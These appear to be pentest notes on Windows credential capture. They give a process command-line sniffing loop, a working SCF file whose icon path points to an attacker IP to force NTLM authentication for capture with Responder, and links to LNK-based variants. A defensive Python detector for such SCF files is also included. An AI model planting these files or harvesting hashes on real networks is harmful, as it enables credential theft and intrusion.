To sniff creds on a live interface or from a pcap file: https://github.com/DanMcInerney/net-creds
Sniff command executions (poll the process list once a second and print the difference, so newly started or exited processes show up with their command lines):

```powershell
while ($true)
{
    # Snapshot of all process command lines
    $process = Get-WmiObject Win32_Process | Select-Object CommandLine
    Start-Sleep 1
    # Second snapshot one second later
    $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
    # Compare on the CommandLine property; '=>' marks new processes, '<=' marks ones that exited
    Compare-Object -ReferenceObject $process -DifferenceObject $process2 -Property CommandLine
}
```
An SCF (Shell Command File) is used by Windows Explorer to move up and down directories, show the desktop, etc.
An SCF can be manipulated so that its icon file location points to a specific UNC path, which makes Windows Explorer start an SMB session to that host as soon as the folder is browsed.
Example:

```ini
[Shell]
Command=2
IconFile=\\10.10.15.37\share\legit.ico
[Taskbar]
Command=ToggleDesktop
```

Name this file @Inventory.scf (the @ forces the file to be read first in the folder).
Then, running Responder on the attacker, we'll see the NTLM auth.
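From the defensive side, the same two traits (an IconFile that is a UNC path, and a filename starting with @) are what a share-scanning or mail-gateway check should key on. The following is an added example, not code from the page or from any project it links: a small parser for the SCF/INI layout shown above that returns findings for a given file. The sample contents and the host 192.0.2.10 are constructed for the example.

```python
import re
from configparser import ConfigParser, ParsingError

# Constructed sample SCF contents (the host is a documentation-range placeholder, not from the page).
MALICIOUS_SCF = r"""[Shell]
Command=2
IconFile=\\192.0.2.10\share\legit.ico
[Taskbar]
Command=ToggleDesktop
"""
BENIGN_SCF = r"""[Shell]
Command=2
IconFile=%SystemRoot%\system32\SHELL32.dll,3
[Taskbar]
Command=ToggleDesktop
"""

# Matches an IconFile value that starts with a UNC path and captures the host part.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def parse_scf(text):
    """Parse SCF text (INI syntax) into {section: {key: value}}, preserving key case."""
    cp = ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str
    cp.read_string(text)
    return {section: dict(cp.items(section)) for section in cp.sections()}


def scf_findings(filename, text):
    """Return (severity, message) tuples describing why this SCF deserves attention."""
    findings = []
    try:
        data = parse_scf(text)
    except ParsingError:
        return [("info", "content is not valid INI; not an SCF")]
    icon = data.get("Shell", {}).get("IconFile", "")
    match = UNC_RE.match(icon)
    if match:
        # The pattern described above: Explorer will try to fetch the icon over SMB from that host.
        findings.append(("high", f"IconFile is a UNC path to host {match.group(1)}"))
    if filename.startswith("@"):
        findings.append(("medium", "filename starts with '@' so Explorer lists it first"))
    return findings


if __name__ == "__main__":
    for name, text in (("@Inventory.scf", MALICIOUS_SCF), ("Desktop.scf", BENIGN_SCF)):
        print(name, scf_findings(name, text))
```

A benign SCF that references a local icon (as in BENIGN_SCF) yields no findings, so the check can run over every .scf on a share without noise.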
<aside> 💡
SCF files don't work from Server 2019 onward.
We can use .lnk files instead.
</aside>
https://github.com/dievus/lnkbomb
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/16cb4ca1-9339-4d0c-a68d-bf1d6cc0f943